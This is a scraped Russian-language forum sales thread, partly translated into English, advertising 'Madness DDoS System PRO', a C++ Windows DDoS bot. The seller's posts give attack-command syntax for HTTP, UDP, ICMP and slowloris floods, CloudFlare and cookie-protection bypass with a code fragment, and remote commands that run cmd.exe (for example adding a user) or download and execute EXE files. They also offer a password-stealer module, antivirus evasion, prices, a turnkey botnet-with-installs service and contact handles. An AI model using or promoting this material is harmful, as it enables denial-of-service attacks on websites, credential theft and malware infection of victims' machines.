papka.biz - Форум общения и раздач ICQ номеров
19 Август 2018, 20:04:20 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
 
   Начало   Помощь Поиск Календарь Команда Войти Регистрация CHAT ReadMe  


Страниц: [1] 2 3 ... 7   Вниз
  Печать  
Автор Тема: [c++] Madness DDoS System PRO  (Прочитано 5013 раз)
0 Пользователей и 1 Гость смотрят эту тему.
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« : 01 Сентябрь 2013, 11:27:02 »


Madness PRO Stresser verion 2

Дата релиза: 01.09.2013

История создания:
   Летом 2012-го года мы задумались о создании принципиально-нового ДДОС бота для тестирования собственных веб-ресурсов на отказоустойчивость, так как ни одна из протестированных систем не заслужила даже оценки "4".       
   Тестируемые семплы во время работы пожирали память, загружали процессор локальной машины, вылетали с ошибками, зависали на 50% загрузки CPU, неправильно делали записи в реестре, вызывали срабатывание защитных систем, множество весомых ошибок было найдено в панелях управления.
   Для создания своей системы мы подробно изучили: BlackEnergy(исходный код), gbot (дисассемблинг), DirtJumper(дисассемблинг), Darkness Optima(исходный код, приобретен по договору), iBot(исходный код, приобретен по договору), w3Bot (исходный код), так же были изучены исходные коды Zeus и многих околотемных программ.
   
Возможности
   - написан на C++, легко криптуется, имеет малый вес (сжатый семпл < 15кб)
   - полная совместимость со всеми Windows семейства NT (x86 и x64)
   - Бот имеет 7 типов атак
   - стабильность в системе. Показатели нагрузки на CPU и ОЗУ очень равномерные.
   - Не привлекает внимание UAC и Windows Firewall
   - умеет устанавливать port, referal и cookies индивидуально для каждой цели
   - поддерживает до 10-ти целей одновременно
   - имеет очень низкую нагрузку на CPU благодаря новой, сложной системе парсинга команды (во всех аналогах парсинг проходит внутри функции, в множество потоков - это нагружает процессор лишней работой. Новый бот заносит все данные в массив до начала атаки и на функцю приходят уже готовые параметры: адрес, порт, реферал и т.д.)
   - имеет колоссальную выходную мощь более 1500 http (и более 30 000 UDP) запросов в минуту за счет прямого взаимодействия с сетевыми драйверами даже на десктопных Windows! (только при использовании WinSock) Это примерно в 10 раз больше, чем некоторые аналоги и несколько больше лучших (по этому показателю) конкурентов.
   - в панели управления отображаются: количество запросов в минуту, права в системе, версия системы.
   - поддерживает обход CloudFlare защиты (!!!) и многих других, более простых.
   - поддерживает Slow GET и Slow POST режимы!
   - в заголовке пакета указывается отключение кеша (Cache-Control: no-cache), что увеличивает нагрузку на сервер.
   - защита диалога бот-панель спецключем

Модули:
   - PassGrabber (стилер): модуль находит и выгружает на сервер пароли от 26-ти программ(на октябрь 2014-го года).
   цена $55 для базовой лицензии, $100 для лайт лицензии, бесплатно для полной.

Детектирование:
   при проверке билда (без крипта и упаковки) только 3 антивируса из всех выдали подозрение (AVIRA, ClamAV, VBA32). Во время локальных тестов ключевые АВ: Kaspersky, Nod32, DrWeb, Avast пропустили файл в 100% случаев.
   линк на результат: http://virusscan.jotti.org/ru/scanresult/1addb09c12301f5a246271adf835e3a6f4208d8c


Режимы атаки и команды
   Так как система является профессиональной синтаксис комманд давольно сложен, но только на первый взгляд =) Синтаксис команд обратносовместим с системой Darkness.

   dd1 Основной режим работы по HTTP протоколу методом GET, используя соккеты. Поддерживает ***cookies и $$$ref и допускает до 10 целей одновременно (разделитель ";"). Самая быстрая по количеству запросов атака. Пример: dd1=http://ya.ru***cookies$$$referal;http://mail.ru***cookies2$$$referal2
   
   dd2 Тот же режим, что и dd1, только метод POST. Добавляется обязательный параметр @@@post_data. Так же поддерживается до 10-ти целей. Пример: dd2=http://forum.ru/index.php***cookies$$$referal@@@login=yyy&password=hhh, эта команда запостит логин yyy и пароль hhh на скрипт http://forum.ru/index.php

   dd3 атака по HTTP методом GET используя системную библиотеку WinInet.dll. Старая-добрая атака, используемая в многих Delphi ботах. Медленная из-за ограничений десктопных Windows. Не поддерживает реферал и куки, поддерживает до 10 целей. Пример: dd3=http://host.com/script.php

   dd4 атака по HTTP методом POST используя системную библиотеку WinInet. То же что и dd3, только POST. Пример:
dd4=http://host.com/script.php@@@@@@login=yyy&password=hhh

   dd5 ICMP атака (пинги). Поддерживается до 10 целей. Пример dd5=198.168.0.1;199.0.0.1

   dd6 UDP атака. Поддерживается до 10 целей. Обязательные параметры: порт и текст. Пример: dd6=192.168.0.2:27015@@@flud_text

   dd7 атака по HTTP методом GET используя системную библиотеку URMON.dll Средняя по скорости атака, поддерживает до 10 целей и не поддерживает cookies и referal

   cfa команда обхода защиты CloudFlare (!). Используется ТОЛЬКО во время работы dd7. Не оставнавливает выполнение команды dd7. Суть проста - бот выполняет ява скрипт, получает нужную cookie и CloudFlare считает запросы сделанные dd7 авторизованными. Пример: dd7=http://site.ru/index.php, затем (через полторы минуты) cfa=http://site.ru/index.php

   cmd команда выполняется в коммандном интерпритаторе cmd.exe на локальной машине. Не останавливает выполнение других команд. Пример: cmd=net user goodwin /add

   exe команда на загрузку и выполнение EXE файла. Не останавливает выполнение других команд. Файл сохраняется под тем же именем, под которым он был в интернете. Производится 3 попытки скачать файл. Пример: exe=http://site.com/filename.exe

Панель управления:
   Мы использовали измененную на ~70% ПУ от другого комплекса (приобретенную по договору на изменение и перепродажу), переписав ее практически полностью, так как было обнаружено слишком много ошибок и код не понравился. Естественно все было исправлено и оптимизировано - новая ПУ Вам понравится!

Скриншоты:
 :screenshot: Скриншот|Screenshot
 :screenshot: Скриншот|Screenshot


Демонстрация:
   Так-как система очень мощная и для демонстрации возможностей нужно всего 15-20 ботов, которые всегда в наличии - селлеры постараются продемонстрировать мощность.

Цены:
   - тестовая лицензия $0 (только для проверяющих на форумах и тестеров. обновления не предусмотрены)
   - лайт лицензия $250 (обновление/ребилд $75 обновление на новую версию $100)
   - базовая лицензия $350 (обновление/ребилд $35, обновление на новую версию $100)
   - полная лицензия $550 (все обновления, ребилды и модули бесплатны)

Скидки:
   - 30% для владельцев GBot/Dirt Dumper, базовой лицензии iBot, базовой/серебряной лицензии Darkness
   - 50% для владельцев золотой и бриллиантовой лицензии Darkness/iBot
   - 20% дополнительно для тех, кто приобретал указанные выше продукты не более недели назад.

Оплата
   к оплате принимаются ЯД, WMR/WMZ/WMB, PM и LR. А так же любая валюта через обменник.

Гарантии:
   Готовность работать через гаранта любого, известного форума.

Рассрочка
   Для имеющих репутацию и/или аттестаты людей предусмотрена система рассрочки. Обсуждается индивидуально. Кроме лайт лицензий.

Контакты
   - селлер 1  ICQ: 902300    JAB: damir@exploit.im (OTR)
   - селлер 2  ICQ: 903400
   - селлер 3  ICQ: 709750

Готов пройти проверку на условиях администрации форума.


English solution:

Release date: 01.09.2013

History:
Created in the summer of 2012 we started thinking about creating a fundamentally new DDoS bot-testing your own web resources on fault tolerance, and load.
Sample targets tested had memory crash, over loaded processor of local machines which start generating errors, freezing CPU at just 50% load. Created bad entries in the registry which triggers protective systems, many errors were found in the error logs.
When building this system, we studied in detail: BlackEnergy (source code), Gbot (disassembling), Dirtjumper (disassembling), Darkness Optima (source code, purchased under the contract), ibot (source code, purchased under the contract), w3bot (source)
Features   
- Written in c + +, easily crypt is lightweight (compressed sample <15KB)   
- Full compatibility with all windows family (x86 and x64)   
- Bot has 7 types of attacks   
- Extremely stable system. Load on CPU and ram is very powerful.   
- does not attract attention to UAC Windows Firewall   
- can install port, referal and cookies individually for each attack   
- Supports up to 10 targets simultaneously   
- has a very low load on the cpu with the new, complex system parsing Teams (all analogs parsing passes within a function in multiple threads
- it's extra work load on the processor. New bot enters all data in the array before the attack and come ready function parameters: address, port, referral, etc.)   
- has enormous power output of more than 1500 http (and more 30,000 udp) requests per minute due to direct interaction with network drivers, even on Windows Desktop! (Only when using winsock) is about 10 times more than some analogues and several more top (on this indicator) competitors.   
- in the control panel are: the number of requests per minute, right in the system, the version of the system. - Supports bypassing Cloudflare protection (!) and many other, more simple.   
- support and slow get slow post! mode   
- indicated in the packet header off the cache (cache-control: no-cache), which increases the load on the server.   
- Bot protection of panel.
     
Modules:
   - PassGrabber (stealer): this module find and decrypt passwords. 26 software units supported (on octouber 2014).
   price $50 for base licence, $100 for lite licence, free for full.

Detection:
   Validation build (without crypt and packing) only 3 AV’s of all triggered suspicion (avira, clamav, vba32). during local tests Kaspersky, nNod32, Drweb, Avast all missed file in 100% of cases.
   

Attack modes and commands:
   As the system is a professional syntax with commands, this seems complicated, but only at first glance =)
•   dd1 basic operation by http protocol method get, using sokkety. support *** cookies and $ $ $ ref and allows up to 10 targets simultaneously (separated by ";"). the fastest search volume attack. Example: DD1 = http://ya.ru cookies *** $ $ $ referal; http://mail.ru cookies2 *** $ $ $ referal2   
•   dd2 the same treatment as dd1, only the method of post. added optional parameter @ @ @ post_data. also supports up to 10 goals. Example: dd2 = http://forum.ru/index.php *** cookies $ $ $ referal @ @ @ login = yyy & password = hhh, this team posted a username and password yyy hhh a script
   
•   dd3 attack http get method using the system library wininet.dll. good old attack used in many delphi bots. slow due to the limitations of desktop windows. not support the referral and cookies, supports up to 10 targets. Example: dd3 = http://host.com/script.php
•   dd4 attack http post method using the system library wininet. the same as dd3, only post. Example:
DD4 = @ @ @ http://host.com/script.php @ @ @ = login & password = yyy hhh
•   dd5 icmp attack (pings). supports up to 10 targets. Example dd5 = 198.168.0.1; 199.0.0.1
•   dd6 udp attack. supports up to 10 targets. mandatory parameters: port and text. Example: dd6 = 192.168.0.2:27015 @ @ @ flud_text
•   dd7 attack http get method using the system library urmon.dll average speed attack, supports up to 10 targets and does not support cookies and referal
•   cfa command bypass the security cloudflare (!). used only during dd7. This is simple - the bot executes java script gets the desired cookie and cloudflare considers requests made dd7 authorized. Example: dd7 = http://site.ru/index.php, then (after fifteen minutes) cfa = http://site.ru/index.php
•   cmd command is executed on the command interpreter cmd.exe on the local machine. does not stop the execution of other commands. Example: cmd = net user goodwin / add
•   exe command to load and run the exe file. does not stop the execution of other commands. file will be saved under the same name, under which he was on the Internet. made three attempts to download a file. Example: exe = http://site.com/filename.exe

Control Panel:
We used a modified ~ 70% from another complex (purchased under agreements to resell and change), rewriting it almost completely, as it was found too many mistakes and did not like the code. Naturally everything was corrected and optimized - new pu you like it!

Demonstration:
   how well the system is very powerful and to demonstrate the need 15-20 bots, which are always available - Sellers will try to demonstrate power.

Prices:
   - Test License $0 (only for checking the forums and testers. updates not provided)
   - Lite Licence $250 (update/rebuild $75, upgrade to the new version $ 100)
   - Basic License $350 (Update / Rebuild $35 upgrade to the new version $ 100, the price of the modules will be installed later)
   - full license $550 (all updates Rebuild and modules are free)

Discounts:
   - 30% for owners Gbot / Andromeda / Dirt dumper, basic license ibot, base / silver license Darkness
   - 50% for owners of gold and diamond license Darkness / ibot
   - 20% extra for those who acquired the products listed above are not more than a week ago.

Payment
Accepted payment methods, WMR / WMZ / WMB, PM and BTC. as well as any currency through an currency exchanger.

Warranty:
   Willing to work with the buyer to resolve any issues that may be encountered.

Contacts
   - Seller 1 ICQ: 902300    JAB: damir@exploit.im
   - Seller 2 ICQ: 903400
   - Seller 3 ICQ: 709750

Теги для гугла: бот, ддос, ддос бот, меднеес, меднесс бот, маднесс, маднесс бот, маднесс ддос, купить ддосер, маднесс купить, купить ддоса бота, купить ддос, Madness DdoS Bot, buy madness bot, Optima DDoS, DDoS Bot, Buy bot, лучший ддос бот, лучший DDoS бот, best DDoS bot, как заддосить, как сделать ддос, где заказати ддос, ддос услуги, как досить самому, программы для ддоса, сильнеший ддос бот, лучший ботнет, лучший троян, лучший ддос, купить троян, купить лоадер, купить кейлоггер, крутой бот, мегабот, где купить вирус, убить сайт, русская интернет армия, обход антиддос защит, положить сервер, убить игру, убить стрим, убить трансляцию, дудос, дудос сука, слоу ддос, slow ddos, обход UAC, UAC bypassyng, обход фаерволла, firewall bypassing
« Последнее редактирование: 04 Февраль 2015, 17:27:42 от DamRai » Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #1 : 16 Сентябрь 2013, 12:33:10 »

Пройдены проверки:

https://damagelab.org/index.php?showtopic=24604
http://valuta.so/showthread.php?p=6656#post6656
http://darkmoney.cc/kuplya-prodazha-36/c-madness-ddos-pro-17466/

Так же вышло обновление 1.08:
* новый метод резолва (более быстрый)
* изменена слоу хттп атака

Ждем Вас в

 JAB: damrai13@jabber.ru
 ICQ: 902300
 ICQ: 903400
 ICQ: 709750
« Последнее редактирование: 20 Март 2014, 15:47:51 от DamRai » Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #2 : 27 Сентябрь 2013, 13:12:58 »

Обход защиты CloudFlare.

   Защитный комплекс CloudFlare базируется на определении браузера за счет выполнения в нем Java скрипта, после чего клиенту выдается уникальная cookies.
   Бот, как и браузер, теоретически может выполнить Java скрипт. Огромная сложность в том, чтобы уместить необходимый объем математических функций в скромный размер билда бота, однако некоторые экземпляры с поставленое задачей справляются!
   Рассмотрим пример тестирования сервера http://server.com, защищенного CloudFlare с помощью комплекса с++ Madness 1.08:
1)   Ботнету отдается команда dd7=http://server.com, после чего начинаются реквесты на сервер с помощью системной библиотеки UrlMon. Как видно по логам сервера и сниферу, ботам возвращается ошибка 302, что означает работу защиты.

2)   Ботнету отдается команда cga=http://server.com и боты запрашивают cookies для авторизации. Выполнив Java скрипт каждый бот получает уникальную (для его ip и useragent) cookie которую тут же включает в заголовок пакета. По логам видно что запросы на сервер проходят в нормальном режиме и возвращаемый контент соответствует контенту вебсайта на нем!

Q)   Почему нельзя сделать это автоматически?
A)   В зависимости от настроек защиты cookie может изменяться в произвольном интервале и авторизацию нужно проходить вновь. Пока что автоматика не справляется с этим так, как этого делает человек-профессионал. Слишком частый интервал проверки сильно ухудшает юзабилити сайта, т.к. обычные пользователи видят качели CloudFlare каждый Божий секунд.

Q)   Можно ли использовать этот метод постоянно, для любых целей?
A)   Можно, но не рекомендуется. Т.к. dd7 сама по себе более медленная атака в сравнении с dd1, а тут еще нагрузка увеличивается из-за составления спецпакета обхода защиты.


Новости проекта
С сегодняшнего дня с нами работает еще один селлер отдела продаж: iSupport (709750)

Контакты:
 JAB: damrai13@jabber.ru
 ICQ: 902300
 ICQ: 903400
 ICQ: 709750
« Последнее редактирование: 20 Март 2014, 15:48:12 от DamRai » Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #3 : 10 Октябрь 2013, 12:05:24 »

Ревизия 1.12 от 7.10.2013

Так как с момента релиза продано приличное количество копий - сигнатуры попали в бд АВ, для того чтобы нормализовать ситуацию решили почистить код изменив некоторые алгоритмы и переменные локал/статик + прочее.

Отныне такие обновления будут выходить регулярно по плану ~ 2 раза в месяц.

Для владельцев Full лицензии и купивших любую лицензию менее 3х суток назад обновление бесплатно!

Контакты:
 JAB: damrai13@jabber.ru
 ICQ: 902300
 ICQ: 903400
 ICQ: 709750
« Последнее редактирование: 20 Март 2014, 15:48:22 от DamRai » Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #4 : 21 Октябрь 2013, 09:18:33 »

Обновление 1.13 внеплановое, бесплатное для владельцев 1.12

Выявлена и исправлена проблема, из-за которой программа падала на 2003 и 2008 системах некоторых регионов.

Всем владельцам просьба не прогружать 1.12 по "дедикам" и обновиться.

Контакты:
 JAB: damrai13@jabber.ru
 ICQ: 902300
 ICQ: 903400
 ICQ: 709750
« Последнее редактирование: 20 Март 2014, 15:48:30 от DamRai » Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #5 : 05 Ноябрь 2013, 11:01:18 »

Ревизия 1.14 от 3.11.2013

* Адаптация под ОС Windows 8.1

* Мелкие изменения (чистки) кода для урегулирования "проблем" с эвристикой, в частности переведение всех возможных переменных в static.

Контакты:
 JAB: damrai13@jabber.ru
 ICQ: 902300
 ICQ: 903400
 ICQ: 709750
« Последнее редактирование: 20 Март 2014, 15:48:42 от DamRai » Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #6 : 12 Ноябрь 2013, 10:17:18 »

Slowloris DDoS атака с помощью комплекса Madness (1.14+)

Рассмотрим пример тестирования веб-сервера на устойчивость к slow (медленным) атакам при помощи Madness 1.14

Теория: атака основана на уязвимости веб-серверов. запрос передается крайне медленно, что заставляет сервер держать соккет открытым, быстро достигается лимит и сервер становится недоступен.

Комплекс Madness переводит соккеты локальной машины в неблокируемые и обратно, что позволяет минимизировать лаги локальной машины.

Крайне уязвимы к slow атакам вебсерверы на базе:

Apache (1.x & 2.x)
dhttpd
Goahead web server

Практика: Для запуска атаки используется команда ds1=http://webserver.zone
Поддерживается до 10 целей (через символ Подмигивающий, но рекомендуется использовать по одной.

Во время выполнения атаки боты могут частично пропадать из командного центра, это связано с "переполнением" локальных соккетов и носит временный характер.

Контакты:
 JAB: damrai13@jabber.ru
 ICQ: 902300
 ICQ: 903400
 ICQ: 709750
« Последнее редактирование: 20 Март 2014, 15:48:52 от DamRai » Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #7 : 26 Ноябрь 2013, 13:02:50 »

Ревизия 1.15 от 25.11.2013
Плановое обновление
- регулярные чистки кода
- легкие изменения в алгоритме дропа для обхода некоторых эвристических систем.


Revision 1.15 at 25.11.2013
The planed update
- regular cleaning of source
- simple change in drop algorithm to bypassing heuristics analyse of some antyvirus systems

Контакты:
 JAB: damrai13@jabber.ru
 ICQ: 902300
 ICQ: 903400
 ICQ: 709750
« Последнее редактирование: 20 Март 2014, 15:49:00 от DamRai » Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #8 : 10 Декабрь 2013, 12:08:30 »

Обход стандартных cookies защит с помощью комплекса Madness 1.15+

Многие хостинг площадки автоматически подключают защиту по кукам к атакуемому ресурсу, такая защита выдает каждому клиенту индивидуальную куку и, впоследствии, предоставляет доступ только по ней. Иногда выдача происходит автоматически, иногда пользователю выдается информационное сообщение и кука выдается при нажатии на ОК.

Всего используются семь видов таких защит (основных), встречаются так же и экзотические. Madness 1.15+ способен полностью автоматически детектировать все основные типы и так же автоматически применять к ним соответствующий шаблон обхода. Так же существуют универсальные шаблоны для обхода нестандартных типов защиты, которые тоже применяются полностью автоматически

Для работы по таким целям используется команда dc1. Например так dc1=http://yandex.ru. Допускается несколько целей с одного сайта, но не допускается одновременная работа по нескольким сайтам, т.к. кука хранится только для одного.

Контакты:
 JAB: damrai13@jabber.ru
 ICQ: 902300
 ICQ: 903400
 ICQ: 709750
« Последнее редактирование: 20 Март 2014, 15:49:09 от DamRai » Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #9 : 10 Январь 2014, 13:54:27 »

Ревизия 1.16 от 10.01.2014

* Изменение в алгоритме работы dc1 (обход антиддос систем), добавлены новые пресеты убраны неактуальные, откорректированы некоторые из текущих.

* Легкие изменение в системе дропа и защиты файла.

* Плановая чистка кода.



Update 1.16 at 10.01.2014

* Change dc1 method (bypassyng antiddos system)/ added new presets, remove not actual, fix others

* Simple change on drop method and self file protection

* Planed code cleaning.


Цена обновления: по прайсу.

Контакты:
 JAB: damrai13@jabber.ru
 ICQ: 902300
 ICQ: 903400
 ICQ: 709750
« Последнее редактирование: 20 Март 2014, 15:49:19 от DamRai » Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #10 : 22 Январь 2014, 11:20:51 »

Создание дееспособного ботнета "под ключ"
Если Вам некогда вникать во все тонкости и терминологию, а нужно просто работать не загружаясь лишним - Вы можете воспользоваться данной услугой, которая включает в себя:

* базовую лицензию на бота c++ Madness
* хостинг:  заказа, настройка, установка ПО, оплата на 2 месяца
* домен: регистрация у стороннего регистратора.
* крипт
* загрузки: 5000 уникальных инсталлов со связки.

Цена: $1200, в случае с полной лицензией на бота цена: $1500

Контакты:
 JAB: damrai13@jabber.ru
 ICQ: 902300
 ICQ: 903400
 ICQ: 709750
« Последнее редактирование: 20 Март 2014, 15:49:28 от DamRai » Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #11 : 28 Январь 2014, 12:00:54 »

Масштабное обновление 1.18

- добавлено два новых шаблона обхода антиддоса по кукам (широко используемого на хостингах таймвеб, джино и др. популярных).

- изменен дроп, вместо winexec используется shellexecute.

- изменена (упрощена) процедура установки CHMODs на директорию и файл (2 этапа вместо 4х).

- исправлена ошибка из-за которой тип учетной записи всегда определялся как adm.

- исправлено 2 мелких ошибки и порядка 10-ти неточностей в коде.

- добавлена дополнительная защита от взлома ЕХЕ, регулярные проверки урла на соответствие оригиналу зашитому при билде ЕХЕ.

- чистка кода.

Контакты:
 JAB: damrai13@jabber.ru
 ICQ: 902300
 ICQ: 903400
 ICQ: 709750
« Последнее редактирование: 20 Март 2014, 15:49:37 от DamRai » Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #12 : 17 Февраль 2014, 11:38:36 »

Плановое обновление 1.19
Бесплатное, для купивших 1.18

The planed updade 1.19
Free for 1.18 buyers

Контакты:
 JAB: damrai13@jabber.ru
 ICQ: 902300
 ICQ: 903400
 ICQ: 709750
« Последнее редактирование: 20 Март 2014, 15:49:47 от DamRai » Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #13 : 25 Февраль 2014, 10:41:20 »

Обновление панели управления Madness. Версия за февраль 2014.
Дизайн адаптирован под HTML5 для правильного отображения в Opera 19 и других новых браузерах.
Обновление бесплатное.

Update of Madness CP. Version of feb. 2014.
Design adapted at HTML 5 to correct viewing in Opera 19 or another, new browsers.
Free update.



Контакты:
 JAB: damrai13@jabber.ru
 ICQ: 902300
 ICQ: 903400
 ICQ: 709750
« Последнее редактирование: 20 Март 2014, 15:49:59 от DamRai » Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #14 : 04 Март 2014, 10:52:27 »

Юбилейное обновление - ревизия 1.20 от 02.03.2014

Улучшен режим dc1, добавлены новые пресеты обходов
Общие доработки ядра, улучшающие стабильность.
обновление бесплатное для купивших 1.19

Improved mode dc1, more new preset's added.
General improvements kernel, improving the stability.
update free for 1.19 buyers

Контакты:
 JAB: damrai13@jabber.ru
 ICQ: 902300
 ICQ: 903400
 ICQ: 709750
« Последнее редактирование: 20 Март 2014, 15:50:08 от DamRai » Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #15 : 11 Март 2014, 11:26:54 »

Первые полгода продаж позади!
За это время мы прошли проверки на форумах, а бот зарекомендовал себя одним из лучших!
Мы благодарим всех наших клиентов за использование ПО и приглашаем к сотрудничеству новых, поэтому...

На март месяц действуют скидки:
базовая лицензия - $470
полная лицензия - $900

Discount in March:
base licence - $470
full licence - $900

Контакты:
 JAB: damrai13@jabber.ru
 ICQ: 902300
 ICQ: 903400
 ICQ: 709750
« Последнее редактирование: 20 Март 2014, 15:50:18 от DamRai » Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #16 : 19 Март 2014, 18:49:37 »

чистка кода 1.20+ бесплатное для купивших 1.20
clean code 1.20+ update, free for 1.20 buyers

Контакты:
 JAB: damrai13@jabber.ru
 ICQ: 902300
 ICQ: 903400
 ICQ: 709750
« Последнее редактирование: 20 Март 2014, 15:50:27 от DamRai » Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #17 : 27 Март 2014, 11:04:16 »

Минигайд по использованию метода dc1=

Некоторые сайты, обычно находящиеся на хостинг площадках, любят ставить защиту по кукам (cookies). Суть ее в том, что при первом обращении к сайту в браузер устанавливается уникальная (для IP клиента и его других параметров) плюшка (кука/cookies) и потом проверяется при каждом обращении... Если есть в заголовке пакета - пропускать, если нету - это злобот и его надо банить на веки-вечные.

Таким образом давольно хорошую армию из 900-1400 ботов можно перебанить за 10 минут используя минимум аппаратных усилий.

Но продвинутые комплексы тестирования нагрузки (далее КТН), такие как Madness Pro, имеют в своем арсенале пресеты (предустановки обхода) таких защит. Система проверяет заголовок на попытку установить cookie и, в случае надобности, устанавливает ее подобно браузеру.

О паритете сил говорить не приходится, так как суммарная вычислительная мощность КТН куда выше чем у любого, даже самого мощного, сервера и результат предсказуем.


Вот примеры защиты по средствам cookies (строка из заголовка http):


Set-Cookie

document.cookie=

cookie и с ней realauth=


Вот пример обхода КТН Madness

Код:
    if ( mPos( cookie, "Set-Cookie", false ) > 0 )
    {
        ...
        ...
        strcat ( GlobalCookie, t2 );
    }

или

    if ( mPos( cookie, "[\"cookie\",\"", false ) > 0 && mPos( cookie, "\"realauth=", false ) > 0 && mPos( cookie, "\"location\"];", false ) > 0 )
    {
    {
        ...
        ...
        strcat ( GlobalCookie, t2 );
    }

Вместо многоточия авторский метод выдергивания куки из заголовка с минимальной затратой процессорного времени, после чего заветная плюшка устанавливается как GlobalCookie и все поктоки КТН "подхватывают" ее, а защита падает в считанные секунды.

На данный момент (март 2014) КТН Madness Pro имеет в арсенале более 20 действующих (реально используемых хостерами) пресетов обхода.

Ограничения
1) Так как cookie уникальна для каждого конкретного сайта, команда dc1= не может быть использована для атаки на несколько сайтов одновременно, но поддерживается несколько целей с одного сайта! (dc1=http://targetsite.com/anyscript.php;http://targetsite.com/anyscript2.php;http://targetsite.com/anyscript3.php

2) В версиях до 1.20 бот мог вызывать повышенную нагрузку на CPU в некоторых системах, при использовании dc1


Использование
Просто отдайте команду dc1=http://targetsite.com/anyscript.php

КТН Madness Pro сам обнаружит и распознает защиту, а так же применит соответствующий пресет обхода.

Пресеты постоянно обновляются, по этому не забывайте регулярно обновлять билд своего Mdness Pro


Контакты
JAB: damrai13@jabber.ru
ICQ: 902300
ICQ: 903400
ICQ: 709750
Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #18 : 03 Апрель 2014, 11:45:59 »

Обновление 1.21 от 30.03.2014 бесплатное для купивших 1.20/1.20+
- добавлено два пресета в dc1
- межпоточный тайминг увеличен до 10 мс, лучшая синхронизация потоков.


Update 1.21 of 30.03.2014 free for 1.20/1.20+ buyers
- 2 presets added in dc1 mode
- timing between threads up to 10 ms, best sync of threads

Контакты:
 JAB: damrai13@jabber.ru
 ICQ: 902300
 ICQ: 903400
 ICQ: 709750
Записан
DamRai
Общительный
**

Репутация: +0/-0
Offline Offline

Сообщений: 282

Спасибо
-Сказал: 0
-Получил: 0


Рефералов: 1
Дата регистрации: 2013-08-05

Награды
« Ответ #19 : 11 Апрель 2014, 11:12:48 »

Фильм-видеоурок: "поражение трех случайно выбранных целей с помощью КТН Madness PRO"

[video]http://www.youtube.com/watch?v=RaGdLBpPf0g[/video]

Получить дополнительную информацию, а так же купить комплекс, Вы можете обратившись сюда:

Контакты
JAB: damrai13@jabber.ru
ICQ: 902300
ICQ: 903400
ICQ: 709750
Записан
Страниц: [1] 2 3 ... 7   Вверх
  Печать  
 
Перейти в:  



RSS | WAP2 | XHTML


Powered by MySQL Powered by PHP Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines
Refferals System by CreateAForum.com
Copyright papka.biz by ExpertD, logo & icons by Dimon5, 2008-2009
| Sitemap
Valid XHTML 1.0! Valid CSS!


Google visited last this page 05 Август 2018, 04:08:31